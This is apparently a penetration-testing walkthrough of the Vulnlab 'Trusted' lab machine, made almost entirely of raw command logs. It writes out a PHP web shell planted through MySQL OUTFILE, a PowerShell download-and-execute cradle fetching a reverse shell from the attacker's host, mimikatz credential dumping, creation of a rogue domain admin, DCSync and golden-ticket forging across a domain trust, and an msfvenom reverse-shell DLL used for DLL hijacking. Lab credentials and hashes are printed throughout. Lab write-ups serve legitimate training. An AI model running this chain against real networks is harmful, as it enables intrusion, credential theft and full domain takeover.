Vulnlab trusted
nmap
enum
gobuster dir -x php -w /usr/share/wordlists/dirb/big.txt -u http://10.10.146.246/dev/ http://lab.trusted.vl/dev/index.html?view=php://filter/convert.base64-encode/resource=C:\xampp\htdocs\dev\db.php echo "PD9waHAgDQokc2VydmVybmFtZSA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIlN1cGVyU2VjdXJlTXlTUUxQYXNzdzByZDEzMzcuIjsNCg0KJGNvbm4gPSBteXNxbGlfY29ubmVjdCgkc2VydmVybmFtZSwgJHVzZXJuYW1lLCAkcGFzc3dvcmQpOw0KDQppZiAoISRjb25uKSB7DQogIGRpZSgiQ29ubmVjdGlvbiBmYWlsZWQ6ICIgLiBteXNxbGlfY29ubmVjdF9lcnJvcigpKTsNCn0NCmVjaG8gIkNvbm5lY3RlZCBzdWNjZXNzZnVsbHkiOw0KPz4=" | base64 -d <?php $servername = "localhost"; $username = "root"; $password = "SuperSecureMySQLPassw0rd1337."; $conn = mysqli_connect($servername, $username, $password); if (!$conn) { die("Connection failed: " . mysqli_connect_error()); } echo "Connected successfully"; ?>
.
upload php shell ( crackstation can crack Robert’s hash )
──(puck㉿kali)-[~/vulnlab/trusted] └─$ mysql -u root -h lab.trusted.vl -p Enter password: Welcome to the MariaDB monitor. Commands end with ; or \g. Your MariaDB connection id is 8 Server version: 10.4.24-MariaDB mariadb.org binary distribution Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MariaDB [(none)]> use news Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed MariaDB [news]> select * from users; +----+------------+--------------+-----------+----------------------------------+ | id | first_name | short_handle | last_name | password | +----+------------+--------------+-----------+----------------------------------+ | 1 | Robert | rsmith | Smith | 7e7abb54bbef42f0fbfa3007b368def7 | | 2 | Eric | ewalters | Walters | d6e81aeb4df9325b502a02f11043e0ad | | 3 | Christine | cpowers | Powers | e3d3eb0f46fe5d75eed8d11d54045a60 | +----+------------+--------------+-----------+----------------------------------+ 3 rows in set (0.022 sec) MariaDB [news]> select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/dev/back.php'; Query OK, 1 row affected (0.023 sec) MariaDB [news]> exit
trigger shell
http://lab.trusted.vl/dev/back.php?c=powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.138/puckshell.txt');/ ┌──(puck㉿kali)-[~/vulnlab/trusted] └─$ python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.146.246 - - [26/Jun/2024 08:13:02] "GET /puckshell.txt HTTP/1.1" 200 - ┌──(puck㉿kali)-[~/vulnlab/trusted] └─$ nc -nlvp 443 listening on [any] 443 ... connect to [10.8.2.138] from (UNKNOWN) [10.10.146.246] 64409 Microsoft Windows [Version 10.0.20348.887] (c) Microsoft Corporation. All rights reserved. C:\xampp\htdocs\dev>whoami nt authority\system
Get some more hashes
C:\temp>hostname labdc C:\temp>whoami nt authority\system c:\temp>curl http://10.8.2.138/mimikatz.exe -o mimi.exe C:\temp>mimi .#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::logonpasswords Authentication Id : 0 ; 1685702 (00000000:0019b8c6) Session : Batch from 0 User Name : cpowers Domain : LAB Logon Server : LABDC Logon Time : 6/26/2024 6:30:01 AM SID : S-1-5-21-2241985869-2159962460-1278545866-1107 msv : [00000003] Primary * Username : cpowers * Domain : LAB * NTLM : 322db798a55f85f09b3d61b976a13c43 * SHA1 : e845d39122d58246ff7e28a282e8ed0e19ede373 * DPAPI : 01644e36ac919f8de1101ff9fde5a7fb tspkg : wdigest : * Username : cpowers * Domain : LAB * Password : (null) kerberos : * Username : cpowers * Domain : LAB.TRUSTED.VL * Password : (null) ssp : credman : cloudap : mimikatz # exit Bye!
examine more
C:\temp>hostname labdc C:\temp>whoami nt authority\system C:\temp>net user puck Passw0rd123! /add /domain The command completed successfully. C:\temp>net localgroup Administrators puck /add /domain The command completed successfully. C:\temp>
We can now also rdp to lab.trusted.vl
──(puck㉿kali)-[~/vulnlab/trusted] └─$ xfreerdp /v:10.10.250.102 /u:puck [11:21:24:778] [102538:102539] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0 [11:21:24:778] [102538:102539] [WARN][com.freerdp.crypto] - CN = labdc.lab.trusted.vl Password:
┌──(puck㉿kali)-[~/vulnlab/trusted] └─$ impacket-secretsdump 'puck@lab.trusted.vl' Impacket v0.12.0.dev1 - Copyright 2023 Fortra Password: [*] Service RemoteRegistry is in stopped state [*] Starting service RemoteRegistry [*] Target system bootKey: 0x68580865f85a4743db214876adf784df [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:86a9ee70dfd64d20992283dc5721b475::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information. [*] Dumping cached domain logon information (domain/username:hash) [*] Dumping LSA Secrets [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:75878369ad33f35b7070ca854100bc07::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c7a03c565c68c6fac5f8913fab576ebd::: lab.trusted.vl\rsmith:1104:aad3b435b51404eeaad3b435b51404ee:30ef48d2054363df9244bc0d476e93dd::: lab.trusted.vl\ewalters:1106:aad3b435b51404eeaad3b435b51404ee:56d93bd5a8250652c7430a4467a8540a::: lab.trusted.vl\cpowers:1107:aad3b435b51404eeaad3b435b51404ee:322db798a55f85f09b3d61b976a13c43::: puck:2102:aad3b435b51404eeaad3b435b51404ee:ab4f5a5c42df5a0ee337d12ce77332f5::: LABDC$:1000:aad3b435b51404eeaad3b435b51404ee:61f6701481ff18844346b2f8ca47119a::: TRUSTED$:1103:aad3b435b51404eeaad3b435b51404ee:88b2e30fba183f0fcdaba561a6ae64f5::: [*] Kerberos keys grabbed ┌──(puck㉿kali)-[~/vulnlab/trusted]
then evil-winrm in lab.trusted.vl
┌──(puck㉿kali)-[~/vulnlab/trusted] └─$ evil-winrm -u puck -p Passw0rd123! -i lab.trusted.vl Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\puck\Documents> cd c:\temp *Evil-WinRM* PS C:\temp> whoami lab\puck *Evil-WinRM* PS C:\temp> . ./PowerView.ps1 At C:\temp\PowerView.ps1: Forest : trusted.vl DomainControllers : {labdc.lab.trusted.vl} Children : {} DomainMode : Unknown DomainModeLevel : 7 Parent : trusted.vl PdcRoleOwner : labdc.lab.trusted.vl RidRoleOwner : labdc.lab.trusted.vl InfrastructureRoleOwner : labdc.lab.trusted.vl Name : lab.trusted.vl Forest : trusted.vl DomainControllers : Children : DomainMode : Unknown DomainModeLevel : 7 Parent : PdcRoleOwner : RidRoleOwner : InfrastructureRoleOwner : Name : trusted.vl *Evil-WinRM* PS C:\temp> Get-DomainTrust SourceName : lab.trusted.vl TargetName : trusted.vl TrustType : WINDOWS_ACTIVE_DIRECTORY TrustAttributes : WITHIN_FOREST TrustDirection : Bidirectional WhenCreated : 9/14/2022 6:42:24 PM WhenChanged : 6/26/2024 6:21:06 AM
Trust Abuse
Using article, we can abuse child->parent domain trust relationship and escalate to enterprise domain.
We need the krbtgt hash of lab.trusted.vl and the SIDs of both domains, then with mimikatz we forge a golden ticket for the enterprise domain admin
lsadump::dcsync /domain:lab.trusted.vl /all
Getting the domain SID of lab.trusted.vl and trusted.vl by running
*Evil-WinRM* PS C:\temp> ./mimi.exe "lsadump::trust /patch" "exit" .#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz(commandline) # lsadump::trust /patch Current domain: LAB.TRUSTED.VL (LAB / S-1-5-21-2241985869-2159962460-1278545866) Domain: TRUSTED.VL (TRUSTED / S-1-5-21-3576695518-347000760-3731839591) [ In ] LAB.TRUSTED.VL -> TRUSTED.VL * 6/26/2024 9:25:12 AM - CLEAR - bd e0 30 b1 e3 5a 6f 28 d7 db 2d 12 f0 19 86 28 ee be df fa 8f 77 b0 7c 8a 82 05 e0 3f c0 85 81 2d 3a 45 eb 64 22 c6 e5 a3 e0 04 3f f8 fd 6d 59 d5 67 36 5d 32 f5 f2 01 3d 4a e9 29 91 c7 30 fa a4 a5 52 22 e6 17 09 c7 86 36 d7 ae 92 38 d2 7f 7a ec 7c 92 97 b6 e7 8f d3 59 74 97 31 70 8a 7d 88 11 29 e4 5c 0e ab b8 41 2a 35 39 68 f4 af 7b 01 bb 5c 6b a6 1d a6 2a d9 dc da 70 62 7e 75 c2 c4 95 9c 61 7c 98 b7 39 76 64 d6 d4 a3 9f fb f0 3c d7 76 d5 26 95 1b 96 e8 3f c2 a7 f2 99 9e 0a e9 b4 30 bf a9 6b 3a e1 ed 1e 33 17 70 43 41 d2 14 11 39 c8 d2 d5 41 54 24 f9 85 db 69 22 70 85 62 47 06 e3 2c 0a e1 bb 6e 8a 41 e8 09 1e e8 27 59 9e e7 14 d3 aa 3f 05 c3 6e 89 12 e7 cc 11 af 1a d9 a5 36 f8 2f e5 bb d5 d9 17 29 7d 11 d5 d5 * aes256_hmac 87a58ba0eaa56e07d5eaadca5d5d043c64ef85efe9420279a98919d6d7b919f8 * aes128_hmac afe52545c051a7f537ea55d5abc96d31 * rc4_hmac_nt f3a4b4a5c1302b7da515ce596ad3281d [ Out ] TRUSTED.VL -> LAB.TRUSTED.VL * 6/26/2024 9:25:10 AM - CLEAR - 31 dd 12 7a 9e f6 47 94 cd 56 25 1b 58 e6 e3 53 f6 77 19 eb ac bf 4f 28 1a 2d 1e 60 3b 16 6a 94 f7 25 a3 2e 40 13 fb 3d bf a4 42 a2 b1 42 bd 64 89 d6 8a 72 91 a7 da 2d ba 83 1e 6c 25 af ef ec 8c 98 3a 67 ad 67 a1 d8 d9 55 f4 dd 23 bc 93 01 16 10 7e ef 64 84 a3 be 02 25 c8 a6 45 93 b4 e8 5c 27 ee 44 06 a7 81 a0 c2 8e 3c 99 32 2b 4e 5a 19 58 55 8c bb b3 c3 24 55 9f 49 da ba 08 65 1c 3d 3c 59 36 cf 0c fe 15 3c 56 60 c8 1b e1 dd 33 54 c4 dd e3 2a a5 20 bf 9d fe dc ff 9e 61 7b 15 08 d3 22 6b a1 71 2d 48 5e 40 3f 66 fb d2 c6 cc 0c d5 af f1 0d 65 3d 72 45 2a c2 2e d7 86 e3 e0 4f 59 c2 61 fc d2 de d1 87 66 4f f8 f6 ee a4 ed e5 3e df bc b5 86 3a 13 ba ee 39 cb 28 84 58 7d 8d 65 43 28 9b f2 b4 d0 69 99 d2 c1 37 d5 d6 45 * aes256_hmac 3e09cb23acb863c8d23bf8d07eace010cb980d5cfbda991345e4a7cec5352ad7 * aes128_hmac 01b6b1243a4a9b0ed26869f79ef1ae75 * rc4_hmac_nt 4eba988516b0b0fcf99c8f1b10e552de [ In-1] LAB.TRUSTED.VL -> TRUSTED.VL * 5/27/2023 4:19:25 PM - CLEAR - ea 31 66 22 35 93 0e ef 05 dd e5 94 f0 70 b5 dd 2c de b4 ec 7a 47 73 ae 20 45 15 00 9c 0c 1a 7e 9a f4 68 c7 22 c9 d2 35 cb 67 bb 8d 56 7e 5b 9f 4e 9c b4 4c 77 a6 b7 41 2e d9 3d e4 87 73 5b ee 44 8b 4f 3f f3 e8 ac 32 21 08 db 79 9a 55 2b a0 6f c2 dd 69 c6 9a b7 4d e1 8a 4c f6 e8 0b 47 a9 cb cf 4d 6f 14 8c 28 44 66 63 85 20 13 3b c8 93 bd 20 38 ff 6c 73 d3 2a 61 a3 10 fc 2f d5 af 29 a8 5b 28 09 0d 1f 17 46 8d 7d 09 fa e8 55 61 2e d7 6b 3a 70 38 11 e0 42 08 4b 5b 2b be 53 2c 62 97 64 42 4e 11 fb 50 ed 2f ef 58 38 be 20 a4 4b f6 cf a7 45 18 73 56 be cd 6c 0a 78 16 f7 51 ae 82 59 95 7a 33 f0 27 a6 6d 08 62 ca 74 5f 82 13 c2 d2 aa 7b 12 96 b8 16 27 2e ee 48 bd e4 21 41 db a2 e2 92 ca f3 5d d6 76 cc b5 66 28 2a 87 92 * aes256_hmac a7880265164670ddfc041c250bdf7d8166bf8ca0c06d86c3ddec12620fdfb800 * aes128_hmac 9d59311c51bd3eb6cc846cf1af53c80f * rc4_hmac_nt fdb9239325aed982da5f521116ffbcaf [Out-1] TRUSTED.VL -> LAB.TRUSTED.VL * 6/26/2024 9:25:10 AM - CLEAR - 7a 6f b9 f0 49 87 53 be 90 63 63 9c d9 8e 15 f5 ce b5 60 98 6d e6 08 0f 7b ab 3a 7b e3 59 48 a4 f4 6e 6f 1a cc 87 f2 19 81 9a 3b e5 f6 b0 59 28 ad 97 e2 fd fb 39 f8 15 98 ca 4e a9 c4 04 60 15 6a ca 97 0e 20 81 77 42 ac c0 c9 0d 4f 49 4d 64 ee 2a 0f ed aa 4c f3 5b fb 51 ef 50 1a 84 5d 15 a8 9c ce a5 37 a7 02 47 ff 67 0d 1a 59 1c f6 c9 11 9f a2 55 7f c0 45 db 29 77 db 54 9e 46 23 ea 60 a3 9d 9c 11 61 44 51 d2 3f 32 cc e3 67 95 1c a5 0a 0f c6 96 3d e2 a3 53 2b 92 41 a2 a2 46 9e 27 65 c4 84 b0 6f 6e 4e 95 70 0e ed a6 a9 8e 1b ac 66 e8 40 61 9f 6e 70 44 6e b1 fc dd a7 72 9d 3e bd ac b7 0e b9 6b 3c a6 b5 a0 d2 9b 74 91 39 02 f8 7c 31 16 09 7c 52 f3 e9 00 3e 0c 88 46 a3 05 c6 5c 2b f9 3c 0c 21 bd b2 04 8b bc 8a b0 74 * aes256_hmac bfc64ba951d28743ef247deb0fa7d69197b9fda301c64ae0765ba9c5c6418183 * aes128_hmac 0fe86c75c4b6686fcae0bd01d0a1fa2c * rc4_hmac_nt cddbd971c2e3e4ef64b4eb024e4e75c0 mimikatz(commandline) # exit Bye!
Next forge a ticket for enterprise domain admin
kerberos::golden /user:Administrator /krbtgt:c7a03c565c68c6fac5f8913fab576ebd /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /sids:S-1-5-21-3576695518-347000760-3731839591-519 /ptt
All that is left is to dump ntds from trusted.vl domain
lsadump::dcsync /domain:trusted.vl /dc:trusteddc.trusted.vl /all
We find
Credentials: Object RDN : Domain Controllers ** SAM ACCOUNT ** SAM Username : Domain Controllers Object Security ID : S-1-5-21-3576695518-347000760-3731839591-516 Object Relative ID : 516 Credentials: Object RDN : DomainDnsZones Object RDN : Administrator ** SAM ACCOUNT ** SAM Username : Administrator User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD ) Object Security ID : S-1-5-21-3576695518-347000760-3731839591-500 Object Relative ID : 500 Credentials: Hash NTLM: 15db<REDACTED>72ef Object RDN : BCKUPKEY_0c265ae3-ef84-4900-9983-b1fbe71e738c Secret
And we we evil-winrm to the main dc
┌──(puck㉿kali)-[~/vulnlab/trusted] └─$ evil-winrm -u Administrator -H '15db<REDACTED>72ef' -i trusted.vl Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> whoami trusted\administrator
.
Recommended path
use dnschef with bloodhound-python
┌──(puck㉿kali)-[~/vulnlab/trusted] └─$ dnschef --fakeip 10.10.158.230 _ _ __ | | version 0.4 | | / _| __| |_ __ ___ ___| |__ ___| |_ / _` | '_ \/ __|/ __| '_ \ / _ \ _| | (_| | | | \__ \ (__| | | | __/ | \__,_|_| |_|___/\___|_| |_|\___|_| iphelix@thesprawl.org (18:52:27) [*] DNSChef started on interface: 127.0.0.1 (18:52:27) [*] Using the following nameservers: 8.8.8.8 (18:52:27) [*] Cooking all A replies to point to 10.10.158.230 (18:52:53) [*] 127.0.0.1: proxying the response of type 'SRV' for _ldap._tcp.pdc._msdcs.LAB.TRUSTED.VL (18:52:53) [*] 127.0.0.1: proxying the response of type 'SRV' for _ldap._tcp.pdc._msdcs.LAB.TRUSTED.VL.home (18:52:54) [*] 127.0.0.1: cooking the response of type 'A' for labdc.LAB.TRUSTED.VL to 10.10.158.230 (18:52:55) [*] 127.0.0.1: cooking the response of type 'A' for labdc.LAB.TRUSTED.VL to 10.10.158.230
┌──(puck㉿kali)-[~/vulnlab/trusted] └─$ bloodhound-python -d 'LAB.TRUSTED.VL' -u 'rsmith' -p 'IHateEric2' -ns 127.0.0.1 -dc labdc.LAB.TRUSTED.VL -c all --zip WARNING: Could not find a global catalog server, assuming the primary DC has this role If this gives errors, either specify a hostname with -gc or disable gc resolution with --disable-autogc INFO: Getting TGT for user INFO: Connecting to LDAP server: labdc.LAB.TRUSTED.VL INFO: Found 1 domains INFO: Found 2 domains in the forest INFO: Found 1 computers INFO: Connecting to LDAP server: labdc.LAB.TRUSTED.VL ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains INFO: Found 7 users ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains INFO: Found 47 groups INFO: Found 2 gpos INFO: Found 5 ous INFO: Found 19 containers ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains INFO: Found 1 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: labdc.lab.trusted.vl INFO: Done in 00M 05S INFO: Compressing output into 20240624185341_bloodhound.zip
Bloodhound Analysis show rsmith can set password ewalters
┌──(puck㉿kali)-[~/vulnlab/trusted] └─$ rpcclient -U "rsmith" //10.10.192.230 Password for [WORKGROUP\rsmith]:IHateEric2 rpcclient $> setuserinfo2 ewalters 23 'Passw0rd123!' rpcclient $>
We can verify if the password is actually updated and we can login through WinRM
┌──(puck㉿kali)-[~/vulnlab/trusted] └─$ crackmapexec winrm 10.10.192.230 -u ewalters -p 'Puckiestyle@20242024' SMB 10.10.192.230 5985 LABDC [*] Windows Server 2022 Build 20348 (name:LABDC) (domain:lab.trusted.vl) HTTP 10.10.192.230 5985 LABDC [*] http://10.10.192.230:5985/wsman WINRM 10.10.192.230 5985 LABDC [+] lab.trusted.vl\ewalters:Passw0rd123! (Pwn3d!
and evil-winrm in labdc
┌──(puck㉿kali)-[~/vulnlab/trusted] └─$ evil-winrm -u ewalters -p Passw0rd123! -i 10.10.192.230 Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\ewalters\Documents> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled *Evil-WinRM* PS C:\Users\ewalters\Documents> hostname labdc *Evil-WinRM* PS C:\Users\ewalters\Documents>
.
┌──(puck㉿kali)-[~/vulnlab/trusted] └─$ impacket-smbserver -smb2support share . Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed [*] Config file parsed [*] Incoming connection (10.10.192.230,59756) [*] AUTHENTICATE_MESSAGE (\,LABDC) [*] User LABDC\ authenticated successfully [*] :::00::aaaaaaaaaaaaaaaa [*] Connecting Share(1:IPC$) [*] Connecting Share(2:share) [*] Disconnecting Share(1:IPC$) [*] Connecting Share(3:IPC$) [*] Disconnecting Share(3:IPC$)
*Evil-WinRM* PS C:\AVTest> dir Directory: C:\AVTest Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 9/14/2022 4:46 PM 4870584 KasperskyRemovalTool.exe -a---- 9/14/2022 7:05 PM 235 readme.txt *Evil-WinRM* PS C:\AVTest> net use \\10.8.2.138\share The command completed successfully. *Evil-WinRM* PS C:\AVTest> copy .\KasperskyRemovalTool.exe \\10.8.2.138\share\KasperskyRemovalTool.exe *Evil-WinRM* PS C:\AVTest>
after examine KasperskyRemovalTool.exe with procmon on my windows box
┌──(puck㉿kali)-[~/vulnlab/trusted] └─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.8.2.138 LPORT=2222 -f dll > KasperskyRemovalToolENU.dll [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 324 bytes Final size of dll file: 9216 bytes
*Evil-WinRM* PS C:\AVTest> curl http://10.8.2.138/KasperskyRemovalToolENU.dll -o KasperskyRemovalToolENU.dll *Evil-WinRM* PS C:\AVTest> dir Directory: C:\AVTest Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 9/14/2022 4:46 PM 4870584 KasperskyRemovalTool.exe -a---- 6/27/2024 8:19 AM 9216 KasperskyRemovalToolENU.dll -a---- 9/14/2022 7:05 PM 235 readme.txt *Evil-WinRM* PS C:\AVTest>
After a couple of seconds we receive a shell as cpowers ( a domain admin)
┌──(puck㉿kali)-[~/vulnlab/trusted] └─$ nc -nlvp 2222 listening on [any] 2222 ... connect to [10.8.2.138] from (UNKNOWN) [10.10.192.230] 51759 Microsoft Windows [Version 10.0.20348.887] (c) Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami lab\cpowers C:\Windows\system32>
The below scheduled task was running as user cpowers every 1 min.
C:\Users\cpowers\Documents>type task.ps1 type task.ps1 Get-Process "KasperskyRemovalTool" | Stop-Process -Force Start-Process -FilePath "C:\AVTest\KasperskyRemovalTool.exe" C:\Users\cpowers\Documents>
That’s all